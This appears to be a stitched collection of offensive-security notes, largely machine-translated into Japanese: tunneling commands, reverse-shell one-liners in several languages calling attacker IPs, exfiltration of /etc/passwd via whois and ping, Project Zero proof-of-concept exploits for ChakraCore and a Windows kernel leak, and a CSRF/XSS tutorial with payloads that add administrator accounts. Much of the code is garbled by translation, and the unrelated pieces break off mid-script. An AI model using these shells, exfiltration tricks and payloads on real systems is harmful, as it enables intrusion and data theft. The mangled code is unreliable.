LCX_LISTENとLCX_SLAVEの使用
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./EW -S SSOCKSD -L 9999
$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999
参照のために「3レベルのカスケード」ローカルソックステストケース
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./EW -S LCX_SLAVE -D 127.0.0.1 -E 8888 -F 127.0.0.1 -G 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777
シロアリ
use :3https://rootkiter.com/termite/readme.txtの手順
プロキシスクリプト
Regeorg :3359github.com/sensepost/regeorg
シェルリバウンド
bash
bash -i /dev/tcp/10.0.0.1/8080 01
Perl
perl -e '使用socket; $ i='10 .0.0.1 '; $ p=1234; socket(s、pf_inet、sock_stream、getprotobyname(' tcp ')); if(connect(s、 sockaddr_in($ p、inet_aton($ i)))){open(stdin、 's'); open(stdout、 's'); open(stderr、 's'); exec( '/bin/sh -私');};'
Python
python -c 'インポートソケット、サブプロセス、OS; s=socket.socket.socket(socket.af_inet、socket.sock_stream); s.connect(( '10.0.0.1'、1234)); o s.dup2(s.fileno()、0); os.dup2(s.fileno()、1); os.dup2(s.fileno()、2); p=subprocess.call(['/bin/sh' '、' -i '];'
Php
php -r '$ sock=fsocopen('10 .0.0.1'、1234); exec( '/bin/sh -i 3 3 23'); '
ルビー
ruby -rsocket -e'f=tcpsocket.open('10 .0.0.1 '、1234).to_i; exec sprintf('/bin/sh -i%d%d 2%d '、f、f、f)'
Java
r=runtime.getRuntime()
p=r.exec(['/bin/bash'、 '-c'、 'exec 5/dev/tcp/10.0.0.1/2002; cat 5 | while read line; do \ $ line 25 5; done'] string []))
p.waitfor()
NC
#use-e
NC -E /BIN /SH 223.8.200.234 1234
#not used-e
mknod /tmp /backpipe p
/bin/sh 0/tmp/backpipe | NC AttacherIPリスニングポート1/TMP/バックパイプ
ルア
lua -e 'require(' socket '); require(' os '); t=socket.tcp(); t:connect(' 202.103.243.122 '、' 1234 '); os.execute('/bin/sh -i 3 3 23 ');'
イントラネットファイルの転送およびダウンロード
WPUT
wput dir_name ftp://linuxpig:123456@host.com/
wget
wget http://site.com/1.rar -o 1.rar
ARIAC2(インストールする必要があります)
aria2c -o owncloud.zip 3https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
Powershell
$ p=new-Object System.net.webclient
$ P.DownLoadFile( 'http://Domain/file'、 'c:%homepath%file')
VBSスクリプト
args=wscript.argumentsを設定します
url='http://domain/file'
dim xhttp: set xhttp=createObject( 'microsoft.xmlhttp')
dim bstrm: set bstrm=createObject( 'adodb.stream')
xhttp.open 'get'、url、false
xhttp.send
BSTRMで
.type=1 '。開ける。xhttp.responsebodyを作成します
.savetofile 'c: \%homepath%\ file'、2 '
で終わります
実行:cscript test.vbs
Perl
#!/usr/bin/perl
lwp:simpleを使用します。
getStore( 'http://domain/file'、 'file');
実行:perl test.pl
Python
#!/usr/bin/python
urllib2をインポートします
u=urllib2.urlopen( 'http://domain/file')
localfile=open( 'local_file'、 'w')
localfile.write(u.read())
localfile.close()
実行:python test.py
ルビー
#!/usr/bin/ruby
「net/http」が必要です
net:http.start( 'www.domain.com'){| http |
r=http.get( '/file')
open( 'Save_Location'、 'wb'){| file |
file.write(r.body)
}
}
実行:Ruby test.rb
Php
?php
$ url='http://ww.example.com/file';
$ path='/path/to/file';
$ ch=curl_init($ url);
curl_setopt($ ch、curlopt_returntransfer、true);
$ data=curl_exec($ ch);
curl_close($ ch);
file_put_contents($ path、$ data);
?
実行:php test.php
ncattacker
CATファイル| NC -L 1234
ターゲット
NC HOST_IP 1234ファイル
FTP
FTP 127.0.0.1ユーザー名パスワードファイル終了を取得します
TFTP
TFTP -IホストGET C:%HOMEPATH%FILE LOCATION_OF_FILE_ON_TFTP_SERVER
bitsadmin
bitsadmin /転送n http://domain /file c:%homepath%file
ウィンドウファイル共有
正味使用x: \ 127.0.0.1 \ share /user:example.comuserid mypassword
SCPローカルからリモート
SCPファイルuser@host.com:/TMP
リモートからローカル
scp user@host.com:/TMPファイル
rsyncリモートrsyncサーバーからローカルマシンにファイルをコピーする
rsync -av root@192.168.78.192:3360ww /databack
ローカルマシンからリモートRSYNCサーバーにファイルをコピーする
rsync -av /databack root@192.168.78.192:3360www
certutil.exe
certutil.exe -urlcache -split -f http://site.com/file
コピー
コピー\\ ip \ sharename \ file.exe file.exe
WHOISレシーバーホストB:
NC -VLNP 1337 | SED 's///g' | base64 -d
送信者ホストA:
whois -h host_ip -p 1337 `cat /etc /passwd | base64`
WHOIS + TARFIRST:
ncat -k -l -p 4444 |ティーファイル。b64#teeファイルに、それが確実に持っていることを確認できるようにする
次
TAR CZF - /TMP /* | base64 | xargs -iビットタイムアウト0.03 whois -h host_ip -p 4444ビット
ついに
cat files.b64 | tr -d '\ r \ n' | base64 -d | tar zxv#ファイルを出力します
Ping送信終了:
xxd -p -c 4 Secret.txt |読み取りライン。 ping -c 1 -p $ line ipを行います。終わり
受信者ping_receiver.py:
sysをインポートします
try:
scapy.allからimport *
:を除く
印刷( 'SCAPYが見つかりません、SCAPY: PIPインストールSCAPY'をインストールしてください ')
sys.exit(0)
def process_packet(pkt):
pkt.haslayer(ICMP):の場合
pkt [icmp] .type==8:の場合
data=pkt [icmp] .load [-4:]
print(f '{data.decode(' utf-8 ')}'、flush=true、end=''、sep='')
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1338
Here's a snippet of the method that interprets a javascript function's bytecode.
Js::Var Js::InterpreterStackFrame::INTERPRETERLOOPNAME()
{
PROBE_STACK(scriptContext, Js::Constants::MinStackInterpreter); <<----- (a)
if (!this->closureInitDone)
{
Assert(this->m_reader.GetCurrentOffset() == 0);
this->InitializeClosures(); <<------- (b)
}
...
... interprets the bytecode
...
At (b), it initializes the local variables of the javascript function. In the PoC, the variables a, b and c are initialized.
But at (a), if it fails to reserve Js::Constants::MinStackInterpreter bytes on the stack, it throws an exception, which leads to the following code.
void StackScriptFunction::BoxState::Box()
{
...
if (callerFunctionBody->DoStackScopeSlots())
{
Var* stackScopeSlots = (Var*)interpreterFrame->GetLocalClosure();
if (stackScopeSlots)
{
Var* boxedScopeSlots = this->BoxScopeSlots(stackScopeSlots, ScopeSlots(stackScopeSlots).GetCount());
interpreterFrame->SetLocalClosure((Var)boxedScopeSlots);
}
...
...
"stackScopeSlots" contains the local variables that were supposed to be initialized at (b). So it results in accessing the uninitialized pointers.
It's a little difficult to trigger this in Edge. So I recommend to use the command: ./Debug/ch -NoNative ~/test.js.
PoC:
*/
// PoC for the ChakraCore issue described above: `a`, `b` and `c` are locals
// captured by the inner closure `g`, and `g` re-enters `trigger` before it
// touches them. Per the write-up, once the recursion has exhausted the stack
// PROBE_STACK throws before InitializeClosures runs, so BoxState::Box() ends
// up reading scope slots that were never initialized.
function trigger() {
  let a, b, c;
  function g() {
    trigger(); // unbounded recursion; the stack probe is what eventually fails
    a, b, c; // referencing the locals keeps them in the closure's scope slots
  }
  g();
}
trigger(); // entry point: starts the recursion
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1333
Bailout:
"ChakraCore’s background JIT compiler generates highly optimized JIT’ed code based upon the data and infers likely usage patterns based on the profile data collected by the interpreter. Given the dynamic nature of JavaScript code, if the code gets executed in a way that breaks the profile assumptions, the JIT’ed code “bails out” to the interpreter where the slower bytecode execution restarts while continuing to collect more profile data."
From https://github.com/Microsoft/ChakraCore/wiki/Architecture-Overview
One of the ways to generate bailouts in Chakra is to directly change the opcode of an instruction that can't be JITed. This is performed by the method "Lowerer::GenerateBailOut".
Here's a snippet of Lowerer::GenerateBailOut.
...
// Call the bail out wrapper
instr->m_opcode = Js::OpCode::Call;
if(instr->GetDst())
{
// To facilitate register allocation, don't assign a destination. The result will anyway go into the return register,
// but the register allocator does not need to kill that register for the call.
instr->FreeDst();
}
instr->SetSrc1(IR::HelperCallOpnd::New(helperMethod, this->m_func));
m_lowererMD.LowerCall(instr, 0);
Here's some calling patterns of the method.
1.
instr->FreeSrc1();
instr->FreeSrc2();
this->GenerateBailOut(instr);
2.
stElem->FreeSrc1();
stElem->FreeDst();
GenerateBailOut(stElem, nullptr, nullptr);
Judging from the method code that doesn't care about "Src2" and the calling patterns, freeing or unlinking "Src1" and "Src2" is up to the callers. I could spot some points that don't free or unlink an instruction's "Src2", even though the instruction has a "Src2". In these cases, it ends up being converted to "Js::OpCode::Call" with "Src2". So, what happens if a Call instruction has "Src2"?
Here's the trace log of the PoC.
$L13: [helper]
s51<-48> = MOV s51(r13) 4C 89 6D D0
(rdi).u64 = MOV 0xXXXXXXXX (BailOutRecord).u64 48 BF 78 23 00 7C 17 7F 00 00
(rax).u64 = MOV SaveAllRegistersAndBailOut.u64 48 B8 20 92 19 93 1F 7F 00 00
CALL (rax).u64, s51(r13) 49 FF C5
JMP $L14 E9 00 00 00 00
StatementBoundary #-1
"CALL (rax).u64, s51(r13)" is what Chakra wanted to generate (even though CALLs don't take a second operand). "49 FF C5" is the x86-64 code actually generated, and it disassembles as "inc r13". This also means there's a bug in the x86-64 assembler.
PoC bug:
The following buggy method is used to convert a St*Fld instruction to a bailout. Unlike just "StFld" instructions, "StSuperFld" instructions take "Src2" as "this". So the following method should have freed "Src2".
bool
Lowerer::GenerateStFldWithCachedType(IR::Instr *instrStFld, bool* continueAsHelperOut, IR::LabelInstr** labelHelperOut, IR::RegOpnd** typeOpndOut)
{
...
instrStFld->m_opcode = Js::OpCode::BailOut;
instrStFld->FreeSrc1();
<<----------- should call FreeSrc2
instrStFld->FreeDst();
this->GenerateBailOut(instrStFld);
...
}
PoC:
*/
// PoC for the Src2 bailout bug described above: `super.arr = ...` in f() is
// a StSuperFld store, which (per the write-up) carries "this" in Src2, and
// the bailout conversion in GenerateStFldWithCachedType frees Src1 and Dst
// but not Src2.
class MyClass {
  constructor() {
    this.arr = [1, 2, 3];
  }
  f() {
    super.arr = [1];
    this.x; // for passing BackwardPass::DeadStoreTypeCheckBailOut ?
  }
}
let c = new MyClass();
// Call f() repeatedly so the JIT compiles it and reaches the bailout path.
// 0x10000 is the author's iteration count; the actual threshold is not stated.
for (let i = 0; i < 0x10000; i++) {
  c.f();
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1334
The "String.prototype.replace" method can be inlined in the JIT process. So in the method, all the calls which may break the JIT assumptions must be invoked with updating "ImplicitCallFlags". But "RegexHelper::StringReplace" calls the replace function without updating the flag. Therefore it fails to detect if a user function was called.
The PoC shows that it can result in type confusion.
PoC:
*/
// PoC for the String.prototype.replace issue described above. `opt` is first
// warmed up with a replace callback that just returns '0'; it is then called
// once with a callback that overwrites arr[0] with an object. Per the
// write-up, RegexHelper::StringReplace invokes the callback without updating
// ImplicitCallFlags, so the JIT'ed code does not notice the array changed
// under it and the float store to arr[1] proceeds anyway (type confusion).
function main() {
  let arr = [1.1, 1.1, 1.1, 1.1, 1.1];
  function opt(f) {
    arr[0] = 1.1;
    // 'a'.replace('a', f) calls f; parseInt plus the float literal keeps the
    // result a number so this stays a numeric store into arr.
    arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
    arr[2] = 1.1;
    arr[3] = 1.1;
  }
  let r0 = () => '0';
  for (var i = 0; i < 0x1000; i++)
    opt(r0);
  opt(() => {
    arr[0] = {}; // mutates the array from inside the replace callback
    return '0';
  });
  print(arr[1]); // `print` is presumably the ch shell's output helper, not a browser global
}
main(); // entry point
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1303&desc=2
We have discovered that the nt!NtQueryObject syscall handler discloses portions of uninitialized pool memory to user-mode clients when the following conditions are met:
a) It is invoked with the ObjectNameInformation information class and a file object associated with a file on local disk (other configurations were not tested).
b) The provided buffer is too short to contain even the first part of the output data, i.e. the name of the harddisk volume device (e.g. "\Device\HarddiskVolume2").
By empirically testing the system call in the above set up, we have found that it actually behaves in five different ways depending on the length of the output buffer:
a) From 1 to 7 (32-bit) or 15 (64-bit): no output, syscall returns STATUS_INFO_LENGTH_MISMATCH.
b) From 8/16 to N-1 (N being size required to store the name of the volume device): uninitialized pool memory is disclosed to user-mode, syscall returns STATUS_BUFFER_OVERFLOW.
c) From N to N+1: partial path is copied to user-mode, syscall returns STATUS_OBJECT_PATH_INVALID.
d) From N+2 to M-1 (M being the size required to store the entire output data): partial path is copied to user-mode, syscall returns STATUS_BUFFER_OVERFLOW.
e) From M to ...: full path is copied to user-mode, syscall returns STATUS_SUCCESS.
The issue is of course with case (b); it means that between 1 and about 56 bytes of uninitialized kernel pool memory can be leaked with a single nt!NtQueryObject call.
The attached proof of concept program has been tested on 32 and 64-bit builds of Windows 7. It dumps the data leaked by the affected syscall in each subsequent iteration, and then waits for user interaction (ENTER key press) before executing the next one. When the Special Pools mechanism is enabled for ntoskrnl.exe, the PoC output should be similar to the following:
--- cut ---
00000000: e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 ................
00000010: e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 ................
00000020: e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 e1 ................
00000030: e1 e1 e1 e1 e1 e1 e1 ?? ?? ?? ?? ?? ?? ?? ?? ?? ................
00000000: 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 ################
00000010: 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 ################
00000020: 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 ################
00000030: 23 23 23 23 23 23 23 ?? ?? ?? ?? ?? ?? ?? ?? ?? #######.........
00000000: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
00000010: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
00000020: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d ----------------
00000030: 2d 2d 2d 2d 2d 2d 2d ?? ?? ?? ?? ?? ?? ?? ?? ?? -------.........
00000000: 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 7777777777777777
00000010: 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 7777777777777777
00000020: 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 37 7777777777777777
00000030: 37 37 37 37 37 37 37 ?? ?? ?? ?? ?? ?? ?? ?? ?? 7777777.........
--- cut ---
A different repeated marker byte (inserted by Special Pools upon allocation) is displayed each time, which means that uninitialized data from new pool allocations is disclosed to the user-mode client in each attempt.
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <cstdio>
#define ObjectNameInformation ((OBJECT_INFORMATION_CLASS)1)
// Dumps `dwBytes` bytes of `Data` as 16-byte rows: an 8-digit hex offset,
// the hex column, then a printable-ASCII column. Positions past the end of
// the final row are shown as "??" in the hex column and "." in the ASCII
// column so every row keeps the same width (see the sample output above).
//
// Data    - buffer to dump
// dwBytes - number of valid bytes in Data
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
  const ULONG kRowWidth = 16;
  for (ULONG base = 0; base < dwBytes; base += kRowWidth) {
    printf("%.8x: ", base);
    // Hex column.
    for (ULONG col = 0; col < kRowWidth; col++) {
      ULONG idx = base + col;
      if (idx < dwBytes) {
        printf("%.2x ", Data[idx]);
      } else {
        printf("?? ");
      }
    }
    // ASCII column: only 0x20..0x7e is rendered as-is, everything else as '.'.
    for (ULONG col = 0; col < kRowWidth; col++) {
      ULONG idx = base + col;
      bool printable = idx < dwBytes && Data[idx] >= 0x20 && Data[idx] <= 0x7e;
      putchar(printable ? Data[idx] : '.');
    }
    putchar('\n');
  }
}
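// Probes nt!NtQueryObject with growing ObjectNameInformation buffer lengths to
// find the largest length that still yields STATUS_BUFFER_OVERFLOW (case (b)
// in the description), then repeatedly queries with that length and hex-dumps
// the buffer so the uninitialized pool bytes can be observed.
//
// Returns 0 on a clean exit (stdin reached EOF), 1 on any failure.
int main() {
  // The author requires a native build (see the message); refuse to run under WOW64.
  BOOL wow64 = FALSE;
  if (!IsWow64Process(GetCurrentProcess(), &wow64) || wow64) {
    printf("The program has to be built for the native architecture of your OS (x86 or x64).\n");
    return 1;
  }

  // The description only needs a file object for a file on local disk;
  // svchost.exe is the author's choice of an always-present file.
  HANDLE hFile = CreateFile(L"C:\\Windows\\system32\\svchost.exe", FILE_READ_ATTRIBUTES, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  if (hFile == INVALID_HANDLE_VALUE) {
    printf("CreateFile failed, %d\n", GetLastError());
    return 1;
  }

  BYTE OutputBuffer[0x100];
  ULONG ReturnLength;
  ULONG MaximumLeakLength = 0;
  BOOL FoundBoundary = FALSE;

  // Walk the length upwards until the kernel switches from
  // STATUS_BUFFER_OVERFLOW to STATUS_OBJECT_PATH_INVALID; the last length
  // before that switch is the largest one that leaks (case (b) -> case (c)).
  for (ULONG Length = 0; Length < sizeof(OutputBuffer); Length++) {
    NTSTATUS st = NtQueryObject(hFile, ObjectNameInformation, OutputBuffer, Length, &ReturnLength);
    if (st == STATUS_OBJECT_PATH_INVALID) {
      // Length is unsigned: guard the decrement so 0 cannot wrap around.
      MaximumLeakLength = (Length == 0) ? 0 : Length - 1;
      FoundBoundary = TRUE;
      break;
    }
  }
  if (!FoundBoundary) {
    // Previously the loop fell through with MaximumLeakLength == sizeof(OutputBuffer)
    // and the first query below failed with a confusing status; say so explicitly.
    printf("STATUS_OBJECT_PATH_INVALID was never returned for lengths below %u, cannot determine leak length\n", (unsigned)sizeof(OutputBuffer));
    CloseHandle(hFile);
    return 1;
  }

  for (;;) {
    RtlZeroMemory(OutputBuffer, sizeof(OutputBuffer));
    NTSTATUS st = NtQueryObject(hFile, ObjectNameInformation, OutputBuffer, MaximumLeakLength, &ReturnLength);
    if (st != STATUS_BUFFER_OVERFLOW) {
      printf("NtQueryObject failed, %x\n", st);
      CloseHandle(hFile);
      return 1;
    }
    PrintHex(OutputBuffer, MaximumLeakLength);
    // One dump per ENTER press. On EOF leave the loop so the handle is closed
    // and the process exits, instead of spinning forever (the original
    // `while (1)` made the CloseHandle/return 0 below unreachable).
    if (getchar() == EOF) {
      break;
    }
  }

  CloseHandle(hFile);
  return 0;
}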
0x01 CSRF定義
CSRF(クロスサイトリクエスト偽造)、中国語名:クロスサイトリクエスト偽造、知られている:ワンクリック攻撃/セッションライディング、略語:CSRF/XSRF。クロスサイトスクリプトXSSのように聞こえますが、サイト内の信頼できるユーザーを悪用するXSSとは大きく異なりますが、CSRFは信頼できるユーザーからの要求を装って信頼できるWebサイトを悪用します。 XSS攻撃と比較して、CSRF攻撃はあまり人気が低く(したがって、それらを防ぐためのリソースがかなり少ない)、予防が困難であるため、XSSよりも危険であると考えられています。
0x02 CSRFハザード
攻撃者はあなたの身元を盗み、あなたの名前で悪意のあるリクエストを送信しました。 CSRFにできること:電子メールの送信、メッセージの送信、アカウントの盗み、さらには商品の購入、仮想通貨からの送金.問題が発生した問題:個人のプライバシー漏れと不動産セキュリティが含まれます。
0x03 CSRF脆弱性の原因
CSRFの脆弱性の原因は、ブラウザでWebサイトのCookieが期限切れにならないことです。このウェブサイトにアクセスする限り、ブラウザがクローズまたはログアウトしていない限り、デフォルトでログインしたステータスになります。この期間中、攻撃者は、作成されたCSRFスクリプトまたはCSRFスクリプトを含むリンクを送信します。この操作は、ユーザーが実際に実行したいものではありません。
0x04
CSRFとXSS XSSの違い:
攻撃者は、XSSの脆弱性——コンストラクトコード——被害者に送られた——被害者を発見しました——攻撃者が被害者のCookie ——を取得して攻撃を完了しました
CSRF:
攻撃者は、CSRFの脆弱性——コンストラクトコード——被害者に送信された——被害者に——人を開設し、攻撃を完了するためにコード——を実行したことを発見しました
0x05
CSRFの原則次の図は、CSRF攻撃のアイデアを簡単に説明しています。
上記の図からわかるように、CSRF攻撃を完了するには、被害者は次の2つのステップを完了する必要があります。
1.信頼できるWebサイトAにログインし、Cookieをローカルで生成します。
2。ログアウトすることなく、危険なウェブサイトBにアクセスしてください。
上記の2つの条件のいずれかが満たされていない場合、CSRFに攻撃されません。はい、それは本当ですが、次の状況が起こらないことを保証することはできません。
1. Webサイトにログインした後、タブページを開いて別のWebサイトにアクセスしなくなることを保証することはできません。
2。ブラウザを閉じた後、地元のCookieがすぐに期限切れになり、最後のセッションが終了したことを保証することはできません。 (実際、ブラウザを閉じることはセッションを終了することはできませんが、ほとんどの人はブラウザを閉じることはログアウト/エンドセッションと同等であると誤って信じています.)
3.上の写真のいわゆる攻撃のウェブサイトは、他の脆弱性を備えた信頼できる頻繁に訪問されるウェブサイトである可能性があります。
0x06
CSRF攻撃の例
(1).getタイプcsrf
銀行WebサイトA。これは、GETリクエストを使用して、http://www.mybank.com/transfer.php?tobankid=11money=1000などの銀行譲渡事業を完了します。
次に、短いファイルでURLリンクを相手に送信します。それが被害者に送られている限り、それはトリガーされます
https://0x9.me/m5beh
(2).post-type csrf
上記の問題を排除するために、銀行は譲渡操作を完了するためにPOSTリクエストを使用することを決定しました。
銀行のウェブサイトAのWebフォームは次のとおりです。
format='transfer.php'method=' post '
ptobankid:inputtype='text'name=' tobankid '//p
pmoney:inputtype='text'name=' money '//p
pinputType='submit'Value='転送'//p
/形状
バックグラウンド処理ページTransfer.phpは次のとおりです。
?php
session_start();
if(Isset($ _ request ['tobankid'] isset($ _ request ['money']))
{
buy_stocks($ _ request ['tobankid']、$ _request ['money']);
}
?
上記のフォームを偽造してBk.htmlとして保存することにより、Bk.htmlをhttp://www.backlion.org/bk.htmlの下に置くと、URLをクリックするだけで転送がトリガーされます。
(3)最初の2つの痛みを伴うレッスンの後、銀行は要求されたデータを取得する方法を変更することを決定し、$ _POSTを使用して、POSTで要求されたデータのみを取得します。バックグラウンド処理ページTransfer.phpコードは次のとおりです。
?php
session_start();
if(isset($ _ post ['tobankid'] isset($ _ post ['money']))
{
buy_stocks($ _ post ['tobankid']、$ _post ['money']);
}
?
ただし、偽造フォームは同時に変更できます。
HTML
頭
scriptType='text/javascript'
functionsteal()
{
iframe=document.frames ['steal'];
iframe.document.submit( '転送');
}
/スクリプト
/頭
bodyonload='steal()'
iframename='steal'display=' none '
formmethod='post'name='転送'アクション=' http://ww.mybank.com/transfer.php '
inputtype='hidden'name=' tobankid'value='11 '
inputtype='hidden'name=' money'value='1000'
/形状
/iframe
/体
/HTML
上記の3つの例を要約するために、CSRFの主な攻撃モードは基本的に上記の3つであり、そのうち1番目と2番目が最も深刻であり、トリガー条件は非常に単純であり、URL接続で十分であるため、3番目のタイプはよりトラブルであり、javaScriptを必要とするため、以前のものよりもはるかに低くなります。ただし、いずれにせよ、CSRF攻撃がトリガーされている限り、結果は非常に深刻な場合があります。
上記の3つの攻撃モードを理解すると、CSRF攻撃がWebの暗黙的な認証メカニズムに由来することが実際にわかります。 Webの認証メカニズムは、リクエストがユーザーのブラウザからのものであることを保証できますが、リクエストがユーザーによって承認されることを保証することはできません。
0x07
CSRF実用的な例
(1)。ポスト
のCSRFの実用的な例最初にターゲットサイトを見つけます。 CSRFの害は、主に操作を実行できる場所に存在します。次に、私が構築した環境でログインした後、ページをテストします。
環境はWordPress環境です。公式ウェブサイトで直接ダウンロードできます
テストのためにユーザーインターフェイスを選択しましたが、現在1人のユーザーしかいないことがわかります
次に、ユーザーを追加します
げっぷを使用してカットします
Burpの独自のプラグインを使用して、CSRFを利用します
使用できるCSRF.htmlを生成します
ラベル内の値を変更して、追加されたユーザーが繰り返し追加できないようにします。
ブラウザで試してみてください
キーを実行した後、通常の手段で参加した元の最初のユーザーとユーザーに加えて、新しいtest1ユーザーが追加されたことがわかりました。このユーザーは、CSRFを使用して写真の送信をクリックして実行する操作です。テストはページを変更せず、直接連絡したためです。攻撃者がJSを使用してユーザーに直接トリガーできる場合、対応するページが開かれている限り、この動作は実行されます。
(2).combination csrf+xss
の使用率人々がHTMLを悪用するのは容易ではなく、脆弱性のトリガーは複雑であるため、このトリガー方法をシンプルにする方法を見つけます。
XSSの脆弱性を使用して、CSRFの脆弱性をトリガーし、ユーザーが追加した操作を完了します。
最初に送信されたパケットのコンテンツを理解する必要があります
上記のXSSプラットフォームを開き、CSRFプロジェクトを作成します。コードを書きましょう
Span Data-Wiz-Span='Data-Wiz-Span' Style='Font-Style:
普通; font-size: 0.875Rem; font-family: Microsoft yahei; Color: RGB(51、51、51); background-color: RGB(255、255、
255); 'var xmlhttp;
if(window.xmlhttprequest){
xmlhttp=new
xmlhttprequest();
}それ以外{
xmlhttp=new
ActiveXObject( 'microsoft.xmlhttp');
}
xmlhttp.open( 'post'、 'http://www.backlion.org/wordpress/wp-admin/user-new.php'、true);
xmlhttp.setRequestheader( 'content-type'、 'application/x-www-form-urlencoded');
xmlhttp.send( 'action=createuser_wponce ..');
//ここで投稿データを入力すると、ユーザー名とパスワード /スパンを変更する必要があります
このコードをプロジェクトのコード構成に貼り付けます
次に、メッセージ内の保存されたXSSの脆弱性を介して、利用可能なコードをターゲットサイトに保存します
メッセージが成功した後の効果は次のとおりです
管理者がメッセージをチェックすると、危険なコードを実行し、ユーザーを追加するリクエストを送信します
test2ユーザーはユーザーリストを表示した後に正常に追加されました
この時点で、CSRFの攻撃例はほぼ完了していると言えます。将来、自分でそれを掘り下げなければなりません。
(3)。 Ajaxを使用して、CSRF攻撃のXSSを組み合わせます
攻撃効果を達成するために、CSRFのAJAX要求をXSSに入れることです
テストに使用されるこのCMSの掲示板には、ストレージXSSの脆弱性があります。
ここでは、csrftesterを使用してAjaxを生成できます
Ajaxの中核部分を見ることができます
単純なAjaxを自分で書くこともできます
Span Data-Wiz-Span='Data-Wiz-Span' Style='Font-Style:
普通; font-size: 0.875Rem; font-family: Microsoft yahei; Color: RGB(51、51、51); background-color: RGB(255、255、
255); 'var xmlhttp;
if(window.xmlhttprequest){
xmlhttp=new
xmlhttprequest();
}それ以外{
xmlhttp=new
ActiveXObject( 'microsoft.xmlhttp');
}
xmlhttp.open( 'post'、 'http://192.168.109:99/admin/admin_manage.asp?act=add'、true);
xmlhttp.setRequestheader( 'content-type'、 'application/x-www-form-urlencoded');
xmlhttp.send( 'admin=789password=789password3=789button=data');/span
XSSプラットフォームでプロジェクトを構成します
次に、テストWebサイトの掲示板に挿入します
管理者は、メッセージ情報を確認して管理者アカウントを追加できます
(4).phpcmsv9反射性XSSからCSRF
に管理者アカウントを追加しますPHPCMS V9は、PHP5+MySQLを技術的な基盤として使用して開発されたPHPオープンソースコンテンツ管理システムです。現在、多くの業界ポータル、地元のポータル、政府機関などがこのCMSを使用しているか、二次開発を行っています。
PC_HASHの値は、CSRF防御を実行するためにバックグラウンドで使用されるトークンです。 XSSの脆弱性を前景で発見できる場合、PC_HASH(CSRFトークン)を簡単に取得でき、CSRFの脆弱性をトリガーできます。
反射性XSSを探しています
\ phpcms \ modules \ admin \ plugin.php file public_appcenter_ajx_detail関数(411行にあります)。
/**
*
非同期通話の詳細
*
ここに説明を入力してください.
*/
公共
function public_appcenter_ajx_detail(){
$ id=intval($ _ get ['id']);
$ data=file_get_contents( 'http://open.phpcms.cn/index.php?m=openc=apia=get_detail_byappidid='。$ id);
//$ data=json_decode($ data、true);
echo $ _get ['jsoncallback']。 '('、$ data、 ')';
出口;
}
$ _get ['jsoncallback']は、フィルタリングせずにページに直接出力されます。これは反射的なXSS脆弱性です。
/index.php?m=adminc=plugina=public_appcenter_ajx_detailjsoncallback=script
src=http://www.xsser.com/xss.js/script
反射性XSSを使用して、PC_HASH値を取得します
PC_HASHとXSSの脆弱性により、ユーザーが攻撃者の慎重に構築されたボタンをクリックする限り、攻撃者は攻撃を開始できます。
管理者の権限を追加するためにユーザーを構築するには、最初にadmin_manage_codeを取得する必要があります。
XSSプラットフォームを使用して、CSRF攻撃を起動します
var request=false;
if(window.xmlhttprequest){
リクエスト
=new xmlhttprequest();
もし
(Request.OverRideMimeType){
request.overridemimeType( 'text/xml')
}
} else if(window.activexobject){
var
バージョン=['microsoft.xmlhttp'、 'msxml.xmlhttp'、 'microsoft.xmlhttp'、 'msxml2.xmlhttp.7.0'、
'msxml2.xmlhttp.6.0'、 'msxml2.xmlhttp.5.0'、 'msxml2.xmlhttp.4.0'、 'msxml2.xmlhttp.3.0'、
'msxml2.xmlhttp'];
のために
(var i=0; i versions.length; i ++){
試す {
リクエスト
=new ActiveXObject(バージョン[i])
} catch(e){}
Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/
Description:
binutils is a set of tools necessary to build programs.
The complete ASan output of the issue:
# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE
==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968
READ of size 1 at 0x613000000512 thread T0
#0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10
#1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311
#2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26
#3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643
